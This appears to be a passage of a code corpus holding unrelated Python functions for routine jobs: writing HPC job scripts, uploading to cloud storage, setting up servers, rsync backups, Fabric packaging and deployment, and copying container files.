% (str,self.starccmLic))\n\n fout.write(\"\"\"\\\n\nalias echo \"/bin/echo -e\"\necho \"\\\\n#==============================================\"\necho \"# Begin Star Simulation\"\necho \"# Java Batch File = $javaBatchFile\"\necho \"# sim File = $simFile\"\nif ( $powerOnDemand == 1 ) echo \"# Using Power on Demand license.\"\nset starttime = `date`\necho \"# Start Time = ${starttime}\\\\n\"\n\nif ( $powerOnDemand == 1 ) then\n echo \"\\\\n# Running 'killall ssh' to clear out all prior tunnels.\"\n killall ssh\n echo \"\\\\n# Making a tunnel for the Power on Demand License.\"\n ssh -f -L %s:flex.cd-adapco.com:1999 -L 2099:flex.cd-adapco.com:2099 -N %s\n echo \"\\\\n# Checking to see if there is a valid port tunnel in place for the Power on Demand License.\"\n ps -ef | grep '%s:flex.cd-adapco.com:1999'\nendif\n\"\"\" % (str,self.LicAccessName,str))\n\n fout.write(\"\"\"\\\n\nsetenv CDLMD_LICENSE_FILE %s\nunsetenv LM_LICENSE_FILE\n\nset lnodes=`cat $PBS_NODEFILE`\nset llnodes = `echo $lnodes | sed 's/ /,/g'`\n#echo \"llnodes = $llnodes\"\nset numCores = `echo $llnodes | sed 's/,/ /g' | wc -w`\n\nset EXEC = \"%s\"\n\n$EXEC -power ${powerOnDemandLicense} \\\\\n -on $llnodes \\\\\n -rsh 'ssh -o stricthostkeychecking=no' \\\\\n -classpath ~/bin \\\\\n -load \\\\\n -batch $javaBatchFile \\\\\n $simFile\nset endtime = `date`\necho \"# End Time = ${endtime}\"\necho \"# Start Time = ${starttime}\\\\n\"\necho \"# End Star Simulation\\\\n\"\n\"\"\" % (self.CDLMD_LicFile, self.starccmExec))\n\n fout.close()", "def main():\n arg_parser = argparse.ArgumentParser(description='Transfer data files to AWS S3 bucket.')\n arg_parser.add_argument('mission', action='store', help='Mission data to be transferred.')\n arg_parser.add_argument('target', action='store', help='Which AWS account to receive data.')\n args = arg_parser.parse_args()\n mission = args.mission\n target = args.target.upper()\n\n config = configparser.ConfigParser()\n config.read('aws.ini')\n bucket = config[target]['bucket']\n access_key_id = config[target]['access_key']\n secret_key_id = config[target]['secret_key']\n\n source_dir = os.path.join(OUTBOUND, mission)\n dir_list = get_target_list(source_dir)\n for directory in dir_list:\n if directory.endswith('_TIF'):\n file_dir = os.path.join(source_dir, directory)\n files = get_target_list(file_dir)\n for file in files:\n upload_to_aws(file_dir + file, bucket, mission + f'/{directory}/{file}',\n access_key_id, secret_key_id)", "def main():\n\n\n\n skulls_folder = os.listdir(RAW_IMAGE_DIRECTORY)\n\n # fetch and sort the .mnc and .tag files\n mnc_files = [f for f in skulls_folder if 'mnc' in f]\n tag_files = [f for f in skulls_folder if 'tag' in f]\n mnc_names = [i.split('.mnc')[0] for i in mnc_files]\n \n mnc_files.sort()\n tag_files.sort()\n mnc_names.sort()\n\n # Process and package ndarrays as tuples inside npy file\n package_to_npy(RAW_IMAGE_DIRECTORY, mnc_files, tag_files, mnc_names)\n \n print('\\n' * 5)\n\n # Push the npy files to GCP Cloud Storage\n upload_to_gcp(PROCESSED_IMAGE_DIRECTORY, GCP_PROJECT_NAME, GCP_BUCKET_NAME)", "def main():\n parser = argparse.ArgumentParser(description='ivector runner')\n parser.add_argument('--wav-dir', required=True,\n help='directory to original audio files')\n parser.add_argument('--label-file', required=True,\n help='label files')\n parser.add_argument('--out-dir', required=True,\n help='output directory to data')\n args = parser.parse_args()\n\n tmp_dir = os.path.join(args.out_dir, \"tmp\")\n utt2spk_path = os.path.join(args.out_dir, \"utt2spk\")\n 
wavscp_path = os.path.join(args.out_dir, \"wav.scp\")\n\n if (os.system(\"mkdir -p %s\" % (tmp_dir)) != 0):\n print(\"Error making directory %s\" % (tmp_dir))\n\n # refer to the label and create utt2spk, wav.scp\n f_utt2spk = open(utt2spk_path, 'w')\n f_wavscp = open(wavscp_path, 'w')\n f_label = open(args.label_file, 'r')\n for line in f_label:\n items = line.strip().split(' ')\n wav_file_path = os.path.join(args.wav_dir, items[0] + '.wav')\n if os.path.isfile(wav_file_path):\n f_utt2spk.write(items[1] + '_' + line)\n f_wavscp.write(items[1] + '_' + items[0] + ' ' + wav_file_path + '\\n')\n else:\n raise FileExistsError(\"wav file does not exist: %s\" % wav_file_path)\n f_label.close()\n f_utt2spk.close()\n f_wavscp.close()", "def do_base_setup(run_as_user, branch, base_path, dist_path):\n #install some necessary base deps\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install git-core software-properties-common python-software-properties build-essential ssl-cert\")\n runcmd(\"apt-get update\")\n #node-gyp building for insight has ...issues out of the box on Ubuntu... use Chris Lea's nodejs build instead, which is newer\n runcmd(\"apt-get -y remove nodejs npm gyp\")\n runcmd(\"add-apt-repository -y ppa:chris-lea/node.js\")\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install nodejs\") #includes npm\n\n #Create xcp user (to run bitcoind, counterpartyd, counterblockd) if not already made\n try:\n pwd.getpwnam(USERNAME)\n except:\n logging.info(\"Creating user '%s' ...\" % USERNAME)\n runcmd(\"adduser --system --disabled-password --shell /bin/bash --group %s\" % USERNAME)\n \n #add the run_as_user to the xcp group\n runcmd(\"adduser %s %s\" % (run_as_user, USERNAME))\n \n #Check out counterpartyd-build repo under this user's home dir and use that for the build\n git_repo_clone(branch, \"counterpartyd_build\", \"https://github.com/CounterpartyXCP/counterpartyd_build.git\", run_as_user)", "def main():\n # Initialize logging to the terminal and system log.\n coloredlogs.install(syslog=True)\n # Parse the command line arguments.\n context_opts = dict()\n program_opts = dict()\n dest_opts = dict()\n try:\n options, arguments = getopt.gnu_getopt(sys.argv[1:], 'bsrm:c:t:i:unx:fvqh', [\n 'backup', 'snapshot', 'rotate', 'mount=', 'crypto=', 'tunnel=',\n 'ionice=', 'no-sudo', 'dry-run', 'multi-fs', 'exclude=', 'force',\n 'disable-notifications', 'verbose', 'quiet', 'help',\n ])\n for option, value in options:\n if option in ('-b', '--backup'):\n enable_explicit_action(program_opts, 'backup_enabled')\n elif option in ('-s', '--snapshot'):\n enable_explicit_action(program_opts, 'snapshot_enabled')\n elif option in ('-r', '--rotate'):\n enable_explicit_action(program_opts, 'rotate_enabled')\n elif option in ('-m', '--mount'):\n program_opts['mount_point'] = value\n elif option in ('-c', '--crypto'):\n program_opts['crypto_device'] = value\n elif option in ('-t', '--tunnel'):\n ssh_user, _, value = value.rpartition('@')\n ssh_alias, _, port_number = value.partition(':')\n tunnel_opts = dict(\n ssh_alias=ssh_alias,\n ssh_user=ssh_user,\n # The port number of the rsync daemon.\n remote_port=RSYNCD_PORT,\n )\n if port_number:\n # The port number of the SSH server.\n tunnel_opts['port'] = int(port_number)\n dest_opts['ssh_tunnel'] = SecureTunnel(**tunnel_opts)\n elif option in ('-i', '--ionice'):\n value = value.lower().strip()\n validate_ionice_class(value)\n program_opts['ionice'] = value\n elif option in ('-u', '--no-sudo'):\n program_opts['sudo_enabled'] = False\n elif option in ('-n', 
'--dry-run'):\n logger.info(\"Performing a dry run (because of %s option) ..\", option)\n program_opts['dry_run'] = True\n elif option in ('-f', '--force'):\n program_opts['force'] = True\n elif option in ('-x', '--exclude'):\n program_opts.setdefault('exclude_list', [])\n program_opts['exclude_list'].append(value)\n elif option == '--multi-fs':\n program_opts['multi_fs'] = True\n elif option == '--disable-notifications':\n program_opts['notifications_enabled'] = False\n elif option in ('-v', '--verbose'):\n coloredlogs.increase_verbosity()\n elif option in ('-q', '--quiet'):\n coloredlogs.decrease_verbosity()\n elif option in ('-h', '--help'):\n usage(__doc__)\n return\n else:\n raise Exception(\"Unhandled option! (programming error)\")\n if len(arguments) > 2:\n msg = \"Expected one or two positional arguments! (got %i)\"\n raise Exception(msg % len(arguments))\n if len(arguments) == 2:\n # Get the source from the first of two arguments.\n program_opts['source'] = arguments.pop(0)\n if arguments:\n # Get the destination from the second (or only) argument.\n dest_opts['expression'] = arguments[0]\n program_opts['destination'] = Destination(**dest_opts)\n elif not os.environ.get('RSYNC_MODULE_PATH'):\n # Show a usage message when no destination is given.\n usage(__doc__)\n return\n except Exception as e:\n warning(\"Error: %s\", e)\n sys.exit(1)\n try:\n # Inject the source context into the program options.\n program_opts['source_context'] = create_context(**context_opts)\n # Initialize the program with the command line\n # options and execute the requested action(s).\n RsyncSystemBackup(**program_opts).execute()\n except Exception as e:\n if isinstance(e, RsyncSystemBackupError):\n # Special handling when the backup disk isn't available.\n if isinstance(e, MissingBackupDiskError):\n # Check if we're connected to a terminal to decide whether the\n # error should be propagated or silenced, the idea being that\n # rsync-system-backup should keep quiet when it's being run\n # from cron and the backup disk isn't available.\n if not connected_to_terminal():\n logger.info(\"Skipping backup: %s\", e)\n sys.exit(0)\n # Known problems shouldn't produce\n # an intimidating traceback to users.\n logger.error(\"Aborting due to error: %s\", e)\n else:\n # Unhandled exceptions do get a traceback,\n # because it may help fix programming errors.\n logger.exception(\"Aborting due to unhandled exception!\")\n sys.exit(1)", "def do_pack():\n d = datetime.now()\n local(\"mkdir -p versions\")\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz\\\n'.format(d.year, d.month, d.day, d.hour, d.minute, d.second)\n status = local(\"tar -cvzf\" + file_name + \" ./web_static/\", capture=True)\n if status.succeeded:\n return file_name\n return None", "def do_base_setup(run_as_user, branch, base_path, dist_path):\n #change time to UTC\n runcmd(\"ln -sf /usr/share/zoneinfo/UTC /etc/localtime\")\n\n #install some necessary base deps\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install git-core software-properties-common python-software-properties build-essential ssl-cert ntp runit\")\n \n #install node-js\n #node-gyp building has ...issues out of the box on Ubuntu... 
use Chris Lea's nodejs build instead, which is newer\n runcmd(\"apt-get -y remove nodejs npm gyp\")\n runcmd(\"add-apt-repository -y ppa:chris-lea/node.js\")\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install nodejs\") #includes npm\n gypdir = None\n try:\n import gyp\n gypdir = os.path.dirname(gyp.__file__)\n except:\n pass\n else:\n runcmd(\"mv %s %s_bkup\" % (gypdir, gypdir))\n #^ fix for https://github.com/TooTallNate/node-gyp/issues/363\n\n #Create xcp user, under which the files will be stored, and who will own the files, etc\n try:\n pwd.getpwnam(USERNAME)\n except:\n logging.info(\"Creating user '%s' ...\" % USERNAME)\n runcmd(\"adduser --system --disabled-password --shell /bin/false --group %s\" % USERNAME)\n \n #Create xcpd user (to run counterpartyd, counterblockd, insight, bitcoind, nginx) if not already made\n try:\n pwd.getpwnam(DAEMON_USERNAME)\n except:\n logging.info(\"Creating user '%s' ...\" % DAEMON_USERNAME)\n runcmd(\"adduser --system --disabled-password --shell /bin/false --ingroup nogroup --home %s %s\" % (USER_HOMEDIR, DAEMON_USERNAME))\n \n #add the run_as_user to the xcp group\n runcmd(\"adduser %s %s\" % (run_as_user, USERNAME))\n \n #Check out counterpartyd-build repo under this user's home dir and use that for the build\n git_repo_clone(\"counterpartyd_build\", \"https://github.com/CounterpartyXCP/counterpartyd_build.git\",\n os.path.join(USER_HOMEDIR, \"counterpartyd_build\"), branch, for_user=run_as_user)\n\n #enhance fd limits for the xcpd user\n runcmd(\"cp -af %s/linux/other/xcpd_security_limits.conf /etc/security/limits.d/\" % dist_path)", "def apply_dart(self):\n shutil.copyfile(self.env['DART_JS_BOOTSTRAP'], self.outdir.make_node('dart.js').abspath())\n for filetype in ['dartfiles','jsfiles','htmlfiles','cssfiles','otherfiles']:\n files = getattr(self, filetype)\n for f in files:\n if f.is_bld():\n outf = self.outdir.make_node(f.path_from(self.path.get_bld()))\n elif f.is_src():\n outf = self.outdir.make_node(f.path_from(self.path.get_src()))\n else:\n raise Exception(\"I don't know what I'm doing anymore.\")\n self.create_task('copytask',f,outf)", "def copy_local_code() -> co.Exec:\n image = co.Image(\"python:3.8-alpine\", copy_dir=\"./code\")\n return co.Exec(\"python test.py\", image=image, doc=co.util.magic_doc())", "def deploy_scripts():\n # Upload the boto config file\n put(\"scripts/.boto\", \".boto\")\n # Then upload the scripts\n local(\"tar -czf scripts.tar.gz scripts\")\n put(\"scripts.tar.gz\", \".\")\n run(\"tar zxf scripts.tar.gz\")\n run(\"rm scripts.tar.gz\")\n local(\"rm scripts.tar.gz\")", "def dumpf(self, gzip=False):\n if 0 != len(self.sources):\n os.mkdir(self.name)\n filename = os.path.join(self.name, 'bootstrap.sh')\n f = codecs.open(filename, 'w', encoding='utf-8')\n elif gzip:\n filename = '{0}.sh.gz'.format(self.name)\n f = gziplib.open(filename, 'w')\n else:\n filename = '{0}.sh'.format(self.name)\n f = codecs.open(filename, 'w', encoding='utf-8')\n f.write(self.comment)\n f.write('cd \"$(dirname \"$0\")\"\\n')\n for filename2, content in sorted(self.sources.iteritems()):\n f2 = open(os.path.join(self.name, filename2), 'w')\n f2.write(content)\n f2.close()\n for out in self.out:\n f.write(out)\n f.close()\n if gzip and 0 != len(self.sources):\n filename = 'sh-{0}.tar.gz'.format(self.name)\n tarball = tarfile.open(filename, 'w:gz')\n tarball.add(self.name)\n tarball.close()\n return filename\n return filename", "def _add_scripts(prefix):\n mapping = {\"MAST_HOME\": prefix}\n if \"Windows\" in platform.system():\n 
script_dir = os.path.join(INSTALL_DIR, \"files\", \"windows\")\n files = [\n \"mast.bat\",\n \"mast-system.bat\",\n \"mast-accounts.bat\",\n \"mast-backups.bat\",\n \"mast-crypto.bat\",\n \"mast-deployment.bat\",\n \"mast-developer.bat\",\n \"mast-network.bat\",\n \"test-mast.bat\",\n \"mast-version.bat\",\n \"mast-web.bat\",\n \"mastd.bat\",\n \"mast-ssh.bat\",\n \"set-env.bat\",\n ]\n elif \"Linux\" in platform.system():\n script_dir = os.path.join(INSTALL_DIR, \"files\", \"linux\")\n files = [\n \"mast\",\n \"mast-system\",\n \"mast-accounts\",\n \"mast-backups\",\n \"mast-crypto\",\n \"mast-deployment\",\n \"mast-developer\",\n \"mast-network\",\n \"test-mast\",\n \"mast-version\",\n \"mast-web\",\n \"mast-ssh\",\n \"mastd\",\n \"set-env\",\n ]\n\n for f in files:\n dst = os.path.join(prefix, f)\n src = os.path.join(script_dir, f)\n print(\"{} -> {}\".format(src, dst))\n content = render_template_file(src, mapping)\n write_file(dst, content)\n if \"Linux\" in platform.system():\n os.chmod(dst, 0o755)\n\n if \"Windows\" in platform.system():\n # copy python27.dll to site-packages/win32 directory to get around\n # issue when starting mastd\n src = os.path.join(prefix, \"miniconda\", \"python27.dll\")\n dst = os.path.join(\n prefix,\n \"miniconda\",\n \"Lib\",\n \"site-packages\",\n \"win32\",\n \"python27.dll\"\n )\n copyfile(src, dst)\n for filename in [\"pythoncom27.dll\", \"pythoncomloader27.dll\", \"pywintypes27.dll\"]:\n src = os.path.join(\n prefix,\n \"miniconda\",\n \"Lib\",\n \"site-packages\",\n \"pywin32_system32\",\n filename,\n )\n dst = os.path.join(\n prefix,\n \"miniconda\",\n \"Lib\",\n \"site-packages\",\n \"win32\",\n filename,\n )\n copyfile(src, dst)\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"bin\"),\n os.path.join(prefix, \"bin\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"etc\"),\n os.path.join(prefix, \"etc\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"var\"),\n os.path.join(prefix, \"var\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"usrbin\"),\n os.path.join(prefix, \"usrbin\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"tmp\"),\n os.path.join(prefix, \"tmp\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"doc\"),\n os.path.join(prefix, \"doc\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"contrib\"),\n os.path.join(prefix, \"contrib\")\n )", "def main(base_dir: str, output_dir: str) -> None:\n base_path = pathlib.Path(base_dir)\n output_path = pathlib.Path(output_dir).expanduser()\n\n stage_copy_images(base_path, output_path)\n stage_extract_videos(base_path, output_path)", "def generate_all_files():\n for (name, fn) in lang_module.targets.items():\n path = of_g.options.install_dir + '/' + name\n os.system(\"mkdir -p %s\" % os.path.dirname(path))\n with open(path, \"w\") as outfile:\n fn(outfile, os.path.basename(name))\n print(\"Wrote contents for \" + name)", "def do_pack():\n\n sd = '{0:%Y%m%d%H%M%S}'.format(datetime.now())\n fname = 'versions/web_static_' + sd + '.tgz'\n local('mkdir -p versions')\n rs = local('tar -cvzf ' + fname + ' web_static')\n\n if rs.succeeded:\n return fname\n return None", "def main():\n # Initialize logging to the terminal and system log.\n coloredlogs.install(syslog=True)\n # Parse the command line arguments.\n context_opts = dict()\n program_opts = dict()\n dest_opts = dict()\n try:\n options, arguments = getopt.gnu_getopt(sys.argv[1:], 'bsrm:c:t:i:unx:fvqhVQp', [\n 'backup', 'snapshot', 'rotate', 'mount=', 'crypto=', 'tunnel=',\n 'ionice=', 
'no-sudo', 'dry-run', 'exclude=', 'force',\n 'disable-notifications', 'verbose', 'quiet', 'help', 'multi-fs',\n 'rsync-verbose', 'rsync-quiet', 'rsync-progress'\n ])\n for option, value in options:\n if option in ('-b', '--backup'):\n enable_explicit_action(program_opts, 'backup_enabled')\n elif option in ('-s', '--snapshot'):\n enable_explicit_action(program_opts, 'snapshot_enabled')\n elif option in ('-r', '--rotate'):\n enable_explicit_action(program_opts, 'rotate_enabled')\n elif option in ('-m', '--mount'):\n program_opts['mount_point'] = value\n elif option in ('-c', '--crypto'):\n program_opts['crypto_device'] = value\n elif option in ('-t', '--tunnel'):\n ssh_user, _, value = value.rpartition('@')\n ssh_alias, _, port_number = value.partition(':')\n tunnel_opts = dict(\n ssh_alias=ssh_alias,\n ssh_user=ssh_user,\n # The port number of the rsync daemon.\n remote_port=RSYNCD_PORT,\n )\n if port_number:\n # The port number of the SSH server.\n tunnel_opts['port'] = int(port_number)\n dest_opts['ssh_tunnel'] = SecureTunnel(**tunnel_opts)\n elif option in ('-i', '--ionice'):\n value = value.lower().strip()\n validate_ionice_class(value)\n program_opts['ionice'] = value\n elif option in ('-u', '--no-sudo'):\n program_opts['sudo_enabled'] = False\n elif option in ('-n', '--dry-run'):\n logger.info(\"Performing a dry run (because of %s option) ..\", option)\n program_opts['dry_run'] = True\n elif option in ('-f', '--force'):\n program_opts['force'] = True\n elif option in ('-x', '--exclude'):\n program_opts.setdefault('exclude_list', [])\n program_opts['exclude_list'].append(value)\n elif option == '--multi-fs':\n program_opts['multi_fs'] = True\n elif option == '--disable-notifications':\n program_opts['notifications_enabled'] = False\n elif option in ('-V', '--rsync-verbose'):\n if 'rsync_verbose_count' not in program_opts:\n program_opts['rsync_verbose_count'] = 1\n else:\n program_opts['rsync_verbose_count'] = program_opts['rsync_verbose_count'] + 1\n elif option in ('-Q', '--rsync-quiet'):\n if 'rsync_quiet_count' not in program_opts:\n program_opts['rsync_quiet_count'] = 1\n else:\n program_opts['rsync_quiet_count'] = program_opts['rsync_quiet_count'] + 1\n elif option in ('-v', '--verbose'):\n coloredlogs.increase_verbosity()\n elif option in ('-q', '--quiet'):\n coloredlogs.decrease_verbosity()\n elif option in ('-p', '--rsync-progress'):\n program_opts['rsync_show_progress'] = True\n elif option in ('-h', '--help'):\n usage(__doc__)\n return\n else:\n raise Exception(\"Unhandled option! (programming error)\")\n if len(arguments) > 2:\n msg = \"Expected one or two positional arguments! 
(got %i)\"\n raise Exception(msg % len(arguments))\n if len(arguments) == 2:\n # Get the source from the first of two arguments.\n program_opts['source'] = arguments.pop(0)\n if arguments:\n # Get the destination from the second (or only) argument.\n dest_opts['expression'] = arguments[0]\n program_opts['destination'] = Destination(**dest_opts)\n elif not os.environ.get('RSYNC_MODULE_PATH'):\n # Show a usage message when no destination is given.\n usage(__doc__)\n return\n except Exception as e:\n warning(\"Error: %s\", e)\n sys.exit(1)\n try:\n # Inject the source context into the program options.\n program_opts['source_context'] = create_context(**context_opts)\n # Initialize the program with the command line\n # options and execute the requested action(s).\n RsyncSystemBackup(**program_opts).execute()\n except Exception as e:\n if isinstance(e, RsyncSystemBackupError):\n # Special handling when the backup disk isn't available.\n if isinstance(e, MissingBackupDiskError):\n # Check if we're connected to a terminal to decide whether the\n # error should be propagated or silenced, the idea being that\n # rsync-system-backup should keep quiet when it's being run\n # from cron and the backup disk isn't available.\n if not connected_to_terminal():\n logger.info(\"Skipping backup: %s\", e)\n sys.exit(0)\n # Known problems shouldn't produce\n # an intimidating traceback to users.\n logger.error(\"Aborting due to error: %s\", e)\n else:\n # Unhandled exceptions do get a traceback,\n # because it may help fix programming errors.\n logger.exception(\"Aborting due to unhandled exception!\")\n sys.exit(1)", "def convert_placards():\n\n local('cd import_scripts;../bin/python import_placards.py import')", "def packFiles(source, filesPerBlock, dest):\n\tfileCount = 1\n\t\n\ttmpFileName = \"tmp.h5\"\t\n\n\n\toutFile = createBlockFile(tmpFileName)\t\n\tfor dirname, subdirs, files in os.walk(source):\t\n\t print 'Scanning ' + dirname + '...'\t\n\t for f in files:\t\n\t if f.endswith('.h5'):\t\n\t inFile = h5py.File(os.path.join(dirname, f), 'r')\t\n\t outFile.copy(inFile, outFile['songs'], f)\t\n\t inFile.close()\t\n\t fileCount = fileCount + 1\t\n\t if(fileCount > filesPerBlock):\t\n\t outFile.close()\t\n\t upload(tmpFileName, bucket)\t\n\t fileCount = 1\t\n\t outFile = createBlockFile(tmpFileName)\t\n\n \toutFile.close()\n \tif fileCount > 1:\n\t \tupload(tmpFileName, bucket)\n\n\tos.remove(tmpFileName)", "def run(env: Environment):\n\n package_directory = env.args.get('package_directory') or '.'\n output_directory = env.args.get('output_directory')\n\n directory = os.path.realpath(package_directory)\n if not os.path.exists(directory):\n raise NotADirectoryError('No such directory \"{}\"'.format(directory))\n\n save_directory = (\n os.path.realpath(output_directory)\n if output_directory else\n directory\n )\n\n bundle_directory = tempfile.mkdtemp(prefix='pipper-bundle-')\n\n try:\n print('[COMPILE]: Creating universal wheel')\n distribution_data = create_wheel(directory, bundle_directory)\n print('[COLLECT]: Creating package metadata')\n create_meta(directory, bundle_directory, distribution_data)\n print('[ASSEMBLE]: Creating pipper package bundle')\n path = zip_bundle(bundle_directory, save_directory, distribution_data)\n print('[BUNDLED]:', path)\n except Exception:\n raise\n finally:\n shutil.rmtree(bundle_directory)", "def do_pack():\n files = 'versions/web_static_{}{}{}{}{}{}.tgz'\\\n .format(T.year, T.month, T.day, T.hour, T.minute, T.second)\n local('mkdir -p versions')\n execute = local(\"tar 
-cvzf \" + files + \" ./web_static/\")\n if execute.succeeded:\n return files\n return None", "def _copy_otto_files(self):\n\n # Copy files used by the container\n # Substitute name of the container in the configuration file.\n lxcdefaults = os.path.join(utils.get_base_dir(), \"lxc.defaults\")\n with open(os.path.join(lxcdefaults, \"config\"), 'r') as fin:\n with open(os.path.join(self.containerpath, \"config\"), 'w') as fout:\n for line in fin:\n lineout = line\n if \"${NAME}\" in line:\n lineout = line.replace(\"${NAME}\", self.name)\n elif \"${ARCH}\" in line:\n lineout = line.replace(\"${ARCH}\", self.arch)\n fout.write(lineout)\n\n dri_exists = os.path.exists(\"/dev/dri\")\n vga_device = utils.find_vga_device()\n with open(os.path.join(lxcdefaults, \"fstab\"), 'r') as fin:\n with open(os.path.join(self.containerpath, \"fstab\"), 'w') as fout:\n for line in fin:\n if line.startswith(\"/dev/dri\") and not dri_exists:\n lineout = \"# /dev/dri not found, entry disabled (\"\\\n \"do you use nvidia or fglrx graphics \"\\\n \"drivers?)\\n\"\n lineout += \"#\" + line\n else:\n lineout = line\n fout.write(lineout)\n\n src = os.path.join(lxcdefaults, \"scripts\")\n dst = os.path.join(self.containerpath, \"tools\", \"scripts\")\n with ignored(OSError):\n shutil.rmtree(dst)\n shutil.copytree(src, dst)\n utils.set_executable(os.path.join(dst, \"pre-start.sh\"))\n utils.set_executable(os.path.join(dst, \"pre-mount.sh\"))\n utils.set_executable(os.path.join(dst, \"post-stop.sh\"))\n\n src = os.path.join(lxcdefaults, \"guest\")\n dst = os.path.join(self.containerpath, \"tools\", \"guest\")\n with ignored(OSError):\n shutil.rmtree(dst)\n shutil.copytree(src, dst)\n\n # Some graphics need a proprietary driver\n # driver -> packages to install\n drivers = {\n \"fglrx\": \"fglrx\",\n \"fglrx_pci\": \"fglrx\",\n \"nvidia\": \"nvidia-current\"\n }\n if vga_device is not None and \"Driver\" in vga_device:\n if vga_device[\"Driver\"] in drivers:\n logging.info(\"Installing additional drivers for graphics \"\n \"card {}\".format(vga_device[\"Device\"]))\n # l-h-g must be installed to compile additional modules\n pkgs = \"linux-headers-generic {}\\n\".format(\n drivers[vga_device[\"Driver\"]])\n # TODO: this shouldn't be in the guest directory\n pkgsdir = os.path.join(self.containerpath, \"tools\", \"guest\", \"var\", \"local\", \"otto\", \"config\")\n if not os.path.exists(pkgsdir):\n os.makedirs(pkgsdir)\n with open(os.path.join(pkgsdir, \"00drivers.pkgs\"), 'w') as fpkgs:\n logging.debug(\"Custom drivers written to {}\".format(\n os.path.join(pkgsdir, \"00drivers.pkgs\")))\n fpkgs.write(pkgs)", "def main():\n # This have specific paths to prevent abitrary binaries from being\n # executed. 
The \"gsi\"* utilities are configured to use either grid proxies\n # or ssh, automatically.\n remoteLoginCmd = \"/usr/bin/gsissh\"\n remoteCopyCmd = \"/usr/bin/gsiscp\"\n\n UNKNOWN_PLATFORM_EXIT_CODE = 10\n MISSING_PBS_CONFIG_EXIT_CODE = 20\n\n p = AllocatorParser(sys.argv[0])\n platform = p.getPlatform()\n\n creator = Allocator(platform, p.getArgs(), \"$HOME/.lsst/condor-info.py\")\n\n platformPkgDir = lsst.utils.getPackageDir(\"ctrl_platform_\"+platform)\n configName = os.path.join(platformPkgDir, \"etc\", \"config\", \"pbsConfig.py\")\n execConfigName = os.path.join(platformPkgDir, \"etc\", \"config\", \"execConfig.py\")\n\n creator.load(execConfigName)\n\n creator.loadPbs(configName)\n\n verbose = creator.isVerbose()\n \n pbsName = os.path.join(platformPkgDir, \"etc\", \"templates\", \"generic.pbs.template\")\n generatedPbsFile = creator.createPbsFile(pbsName)\n\n condorFile = os.path.join(platformPkgDir, \"etc\", \"templates\", \"glidein_condor_config.template\")\n generatedCondorConfigFile = creator.createCondorConfigFile(condorFile)\n\n scratchDirParam = creator.getScratchDirectory()\n template = Template(scratchDirParam)\n scratchDir = template.substitute(USER_HOME=creator.getUserHome())\n userName = creator.getUserName()\n \n hostName = creator.getHostName()\n\n utilityPath = creator.getUtilityPath()\n\n #\n # execute copy of PBS file to XSEDE node\n #\n cmd = \"%s %s %s@%s:%s/%s\" % (remoteCopyCmd, generatedPbsFile, userName, hostName, scratchDir, os.path.basename(generatedPbsFile))\n if verbose:\n print cmd\n exitCode = runCommand(cmd, verbose)\n if exitCode != 0:\n print \"error running %s to %s.\" % (remoteCopyCmd, hostName)\n sys.exit(exitCode)\n\n #\n # execute copy of Condor config file to XSEDE node\n #\n cmd = \"%s %s %s@%s:%s/%s\" % (remoteCopyCmd, generatedCondorConfigFile, userName, hostName, scratchDir, os.path.basename(generatedCondorConfigFile))\n if verbose:\n print cmd\n exitCode = runCommand(cmd, verbose)\n if exitCode != 0:\n print \"error running %s to %s.\" % (remoteCopyCmd, hostName)\n sys.exit(exitCode)\n\n #\n # execute qsub command on XSEDE node to perform Condor glide-in\n #\n cmd = \"%s %s@%s %s/qsub %s/%s\" % (remoteLoginCmd, userName, hostName, utilityPath, scratchDir, os.path.basename(generatedPbsFile))\n if verbose:\n print cmd\n exitCode = runCommand(cmd, verbose)\n if exitCode != 0:\n print \"error running %s to %s.\" % (remoteLoginCmd, hostName)\n sys.exit(exitCode)\n\n nodes = creator.getNodes()\n slots = creator.getSlots()\n wallClock = creator.getWallClock()\n nodeString = \"\"\n if int(nodes) > 1:\n nodeString = \"s\"\n print \"%s node%s will be allocated on %s with %s slots per node and maximum time limit of %s\" % (nodes, nodeString, platform, slots, wallClock)\n print \"Node set name:\"\n print creator.getNodeSetName()\n sys.exit(0)", "def compress():\n run_manage_cmd('compress_assets')", "def deploy():\n with cd(\"~/public_html/\"):\n run(\"/usr/local/cpanel/3rdparty/bin/git pull\")\n\n with cd(\"~/public_html/skin/frontend/gemz/default/tools/\"):\n run(\"grunt default\")\n #sudo(\"/scripts/enablefileprotect\")", "def up(self, args):\n try:\n assert len(args) > 0\n path = args[0]\n compress = should('Compress file?')\n self.prepare_upload(path, compress)\n except AssertionError:\n print(\"I need a file name!\")", "def main(opts):\n\n if arguments['--generate-pigz']:\n gen_pigz_thread_helper()\n sys.exit(0)\n\n if arguments['--full']:\n cmd, cmd_hide, backup_path, backup_base, top_backup_base = build_full(arguments)\n 
clean.clean_backups(top_backup_base, int(arguments['--keep']), False)\n check_space(top_backup_base)\n succ = run_backup(cmd, cmd_hide)\n print('Backup ended {0}'.format(('Error', 'Successfully')[succ]))\n if not succ: raise BackupErrorBackupFailed('Backup', backup_path)\n if succ and not opts['--no-prepare']:\n cmd = build_full_prepare(opts, backup_path)\n succ = run_backup(cmd, cmd_hide)\n print('Prepare ended {0}'.format(('Error', 'Successfully')[succ]))\n if not succ: raise BackupErrorBackupFailed('Prepare', backup_path)\n if succ and (opts['--compress'] or int(opts['--compress-threads'])>0):\n threads = check_pigz_treads(opts['--compress-threads'])\n tar_file = tar_dir(backup_path, threads, check=not opts['--no-check'])\n if opts['--enc']:\n encrypt(tar_file, config.pass_phrase)\n elif arguments['--inc']:\n build_inc(arguments)", "def main():\n file_one_path, file_two_path, output_path =\\\n get_command_line_arguments(\n ['/home/ehler002/project/groups/go/Data/Cluster_Data/Dataset.txt',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/translated_genes.fpkm_table',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/Full_fpkm_Table.txt'])\n pattern = 'CRO_T'\n for file_path in [file_one_path, 